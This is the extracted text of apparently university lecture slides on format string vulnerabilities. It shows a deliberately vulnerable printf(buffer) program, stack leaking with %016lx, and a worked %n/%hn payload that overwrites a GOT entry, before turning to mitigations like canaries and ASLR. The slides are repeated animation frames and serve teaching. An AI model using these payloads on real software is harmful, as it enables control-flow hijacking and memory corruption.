![Page 48: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/48.jpg)
format string exploits
printf("The␣command␣you␣entered␣");printf(command);printf("was␣not␣recognized.\n");
what if command is %s?
32
![Page 49: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/49.jpg)
format string exploits
printf("The␣command␣you␣entered␣");printf(command);printf("was␣not␣recognized.\n");
what if command is %s?
32
![Page 50: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/50.jpg)
viewing the stack$ cat test−format.c#include <stdio.h>
int main(void) {char buffer[100];while(fgets(buffer, sizeof buffer, stdin)) {
printf(buffer);}
}$ ./test−format.exe%016lx %016lx %016lx %016lx %016lx %016lx %016lx %016lx00007fb54d0c6790 786c363130252078 0000000000ac6048 3631302520786c363631302500000000 6c3631302520786c 786c363130252078 20786c3631302520
25 30 31 36 6c 78 20 is ASCII for %016lx␣second argument to printf: %rsithird through fifth argument to printf: %rdx, %rcx, %r8, %r9third through fifth argument to printf: %rdx, %rcx, %r8, %r916 bytes of stack after return address
33
![Page 51: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/51.jpg)
viewing the stack$ cat test−format.c#include <stdio.h>
int main(void) {char buffer[100];while(fgets(buffer, sizeof buffer, stdin)) {
printf(buffer);}
}$ ./test−format.exe%016lx %016lx %016lx %016lx %016lx %016lx %016lx %016lx00007fb54d0c6790 786c363130252078 0000000000ac6048 3631302520786c363631302500000000 6c3631302520786c 786c363130252078 20786c3631302520
25 30 31 36 6c 78 20 is ASCII for %016lx␣
second argument to printf: %rsithird through fifth argument to printf: %rdx, %rcx, %r8, %r9third through fifth argument to printf: %rdx, %rcx, %r8, %r916 bytes of stack after return address
33
![Page 52: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/52.jpg)
viewing the stack$ cat test−format.c#include <stdio.h>
int main(void) {char buffer[100];while(fgets(buffer, sizeof buffer, stdin)) {
printf(buffer);}
}$ ./test−format.exe%016lx %016lx %016lx %016lx %016lx %016lx %016lx %016lx00007fb54d0c6790 786c363130252078 0000000000ac6048 3631302520786c363631302500000000 6c3631302520786c 786c363130252078 20786c3631302520
25 30 31 36 6c 78 20 is ASCII for %016lx␣
second argument to printf: %rsi
third through fifth argument to printf: %rdx, %rcx, %r8, %r9third through fifth argument to printf: %rdx, %rcx, %r8, %r916 bytes of stack after return address
33
![Page 53: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/53.jpg)
viewing the stack$ cat test−format.c#include <stdio.h>
int main(void) {char buffer[100];while(fgets(buffer, sizeof buffer, stdin)) {
printf(buffer);}
}$ ./test−format.exe%016lx %016lx %016lx %016lx %016lx %016lx %016lx %016lx00007fb54d0c6790 786c363130252078 0000000000ac6048 3631302520786c363631302500000000 6c3631302520786c 786c363130252078 20786c3631302520
25 30 31 36 6c 78 20 is ASCII for %016lx␣second argument to printf: %rsi
third through fifth argument to printf: %rdx, %rcx, %r8, %r9third through fifth argument to printf: %rdx, %rcx, %r8, %r9
16 bytes of stack after return address
33
![Page 54: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/54.jpg)
viewing the stack$ cat test−format.c#include <stdio.h>
int main(void) {char buffer[100];while(fgets(buffer, sizeof buffer, stdin)) {
printf(buffer);}
}$ ./test−format.exe%016lx %016lx %016lx %016lx %016lx %016lx %016lx %016lx00007fb54d0c6790 786c363130252078 0000000000ac6048 3631302520786c363631302500000000 6c3631302520786c 786c363130252078 20786c3631302520
25 30 31 36 6c 78 20 is ASCII for %016lx␣second argument to printf: %rsithird through fifth argument to printf: %rdx, %rcx, %r8, %r9third through fifth argument to printf: %rdx, %rcx, %r8, %r9
16 bytes of stack after return address
33
![Page 55: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/55.jpg)
viewing the stack — not so bad, right?
can read stack canaries!
but actually much worse
can write values!
34
![Page 56: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/56.jpg)
printf manpage
For %n:The number of characters written so far is stored into the integer pointedto by the corresponding argument. That argument shall be an int *,or variant whose size matches the (optionally) supplied integer lengthmodifier.
%hn — expect short instead of int *
35
![Page 57: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/57.jpg)
printf manpage
For %n:The number of characters written so far is stored into the integer pointedto by the corresponding argument. That argument shall be an int *,or variant whose size matches the (optionally) supplied integer lengthmodifier.
%hn — expect short instead of int *
35
![Page 58: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/58.jpg)
format string exploit: setup
#include <stdlib.h>#include <stdio.h>
int exploited() {printf("Got␣here!\n");exit(0);
}
int main(void) {char buffer[100];while (fgets(buffer, sizeof buffer, stdin)) {
printf(buffer);}
} 36
![Page 59: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/59.jpg)
format string overwrite: GOT
0000000000400580 <fgets@plt>:400580: ff 25 9a 0a 20 00 jmpq *0x200a9a(%rip)
# 601038 <_GLOBAL_OFFSET_TABLE_+0x30>…
0000000000400706 <exploited>:...
goal: replace 0x601030 (pointer to fgets)with 0x400726 (pointer to exploited)
37
![Page 60: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/60.jpg)
format string overwrite: setup
/* advance through 5 registers, then* 5 * 8 = 40 bytes down stack, outputting* 4916157 + 9 characters before using* %ln to store a long.*/
fputs("%c%c%c%c%c%c%c%c%c%.4196157u%ln", stdout);/* include 5 bytes of padding to make current location* in buffer match where on the stack printf will be reading.*/
fputs("?????", stdout);void *ptr = (void*) 0x601038;/* write pointer value, which will include \0s */fwrite(&ptr, 1, sizeof(ptr), stdout);fputs("\n", stdout);
38
![Page 61: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/61.jpg)
demo
39
![Page 62: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/62.jpg)
demo
but millions of characters of junk output?
can do better — write value in multiple piecesuse multiple %n
40
![Page 63: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/63.jpg)
format string exploit pattern (x86-64)
write 1000 (short) to address 0x1234567890ABCDEF
write 2000 (short) to address 0x1234567890ABCDF1
buffer starts 16 bytes above printf return address
%c%c%c%c%c%c%c%c%c%.991u%hn%.1000u%hn…
\x12\x34\x56\x78\x90\xAB\xCD\xEF…\x12\x34\x56\x78\x90\xAB\xCD\xF1
skip over registersskip to format string buffer, past format part9 + 991 chars is 1000write to first pointer1000 + 1000 = 2000write to second pointer
41
![Page 64: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/64.jpg)
format string exploit pattern (x86-64)
write 1000 (short) to address 0x1234567890ABCDEF
write 2000 (short) to address 0x1234567890ABCDF1
buffer starts 16 bytes above printf return address
%c%c%c%c%c%c%c%c%c%.991u%hn%.1000u%hn…
\x12\x34\x56\x78\x90\xAB\xCD\xEF…\x12\x34\x56\x78\x90\xAB\xCD\xF1
skip over registers
skip to format string buffer, past format part9 + 991 chars is 1000write to first pointer1000 + 1000 = 2000write to second pointer
41
![Page 65: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/65.jpg)
format string exploit pattern (x86-64)
write 1000 (short) to address 0x1234567890ABCDEF
write 2000 (short) to address 0x1234567890ABCDF1
buffer starts 16 bytes above printf return address
%c%c%c%c%c%c%c%c%c%.991u%hn%.1000u%hn…
\x12\x34\x56\x78\x90\xAB\xCD\xEF…\x12\x34\x56\x78\x90\xAB\xCD\xF1
skip over registers
skip to format string buffer, past format part
9 + 991 chars is 1000write to first pointer1000 + 1000 = 2000write to second pointer
41
![Page 66: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/66.jpg)
format string exploit pattern (x86-64)
write 1000 (short) to address 0x1234567890ABCDEF
write 2000 (short) to address 0x1234567890ABCDF1
buffer starts 16 bytes above printf return address
%c%c%c%c%c%c%c%c%c%.991u%hn%.1000u%hn…
\x12\x34\x56\x78\x90\xAB\xCD\xEF…\x12\x34\x56\x78\x90\xAB\xCD\xF1
skip over registersskip to format string buffer, past format part
9 + 991 chars is 1000
write to first pointer1000 + 1000 = 2000write to second pointer
41
![Page 67: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/67.jpg)
format string exploit pattern (x86-64)
write 1000 (short) to address 0x1234567890ABCDEF
write 2000 (short) to address 0x1234567890ABCDF1
buffer starts 16 bytes above printf return address
%c%c%c%c%c%c%c%c%c%.991u%hn%.1000u%hn…
\x12\x34\x56\x78\x90\xAB\xCD\xEF…\x12\x34\x56\x78\x90\xAB\xCD\xF1
skip over registersskip to format string buffer, past format part9 + 991 chars is 1000
write to first pointer
1000 + 1000 = 2000write to second pointer
41
![Page 68: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/68.jpg)
format string exploit pattern (x86-64)
write 1000 (short) to address 0x1234567890ABCDEF
write 2000 (short) to address 0x1234567890ABCDF1
buffer starts 16 bytes above printf return address
%c%c%c%c%c%c%c%c%c%.991u%hn%.1000u%hn…
\x12\x34\x56\x78\x90\xAB\xCD\xEF…\x12\x34\x56\x78\x90\xAB\xCD\xF1
skip over registersskip to format string buffer, past format part9 + 991 chars is 1000write to first pointer
1000 + 1000 = 2000
write to second pointer
41
![Page 69: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/69.jpg)
format string exploit pattern (x86-64)
write 1000 (short) to address 0x1234567890ABCDEF
write 2000 (short) to address 0x1234567890ABCDF1
buffer starts 16 bytes above printf return address
%c%c%c%c%c%c%c%c%c%.991u%hn%.1000u%hn…
\x12\x34\x56\x78\x90\xAB\xCD\xEF…\x12\x34\x56\x78\x90\xAB\xCD\xF1
skip over registersskip to format string buffer, past format part9 + 991 chars is 1000write to first pointer1000 + 1000 = 2000
write to second pointer
41
![Page 70: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/70.jpg)
format string assignment
released Friday
one week
good global variable to targetto keep it simple/consistently workingmore realistic: target GOT entry and use return oriented programming(later)
42
![Page 71: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/71.jpg)
control hijacking generally
usually: need to know/guess program addresses
usually: need to insert executable code
usually: need to overwrite code addresses
next topic: countermeasures against these
later topic: defeating those
later later topic: secure programming languages43
![Page 72: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/72.jpg)
control hijacking flexibility
lots of generic pointers to codevtables, GOT entries, function pointers, return addressespretty much any large program
data pointer overwrites become code pointer overwritesoverwrite data pointer to point to code pointerdata pointers are everywhere!
type confusion from use-after-free is pointer overwritebounds-checking won’t solve all problems
44
![Page 73: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/73.jpg)
first mitigation: stack canaries
saw: stack canaries
tries to stop:overwriting code addresses(as long it’s return addresses)
by assuming:compile-in protectionattacker can’t read off the stackattacker can’t “skip” parts of the stack
45
![Page 74: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/74.jpg)
second mitigation: address spacerandomization
problem for the stack smashing assignment
tries to stop:know/guess programming addresses
by assuming:program doesn’t “leak” addressesrelevant addresses can be changed (not hard-coded in program)
46
![Page 75: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/75.jpg)
thinking about the threat
contiguous versus arbitrary writes?just protect next to target?just protect next to buffer?
information disclosure or not?
47
![Page 76: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/76.jpg)
convincing developers
legacy code?
manual effort?
performance overhead?
memory overhead?
48
![Page 77: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/77.jpg)
ideas for mitigations
49
![Page 78: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/78.jpg)
next time
comparing mitigationswhat do they assume the attacker can do?effect on performance?recompilation? rewriting code?
50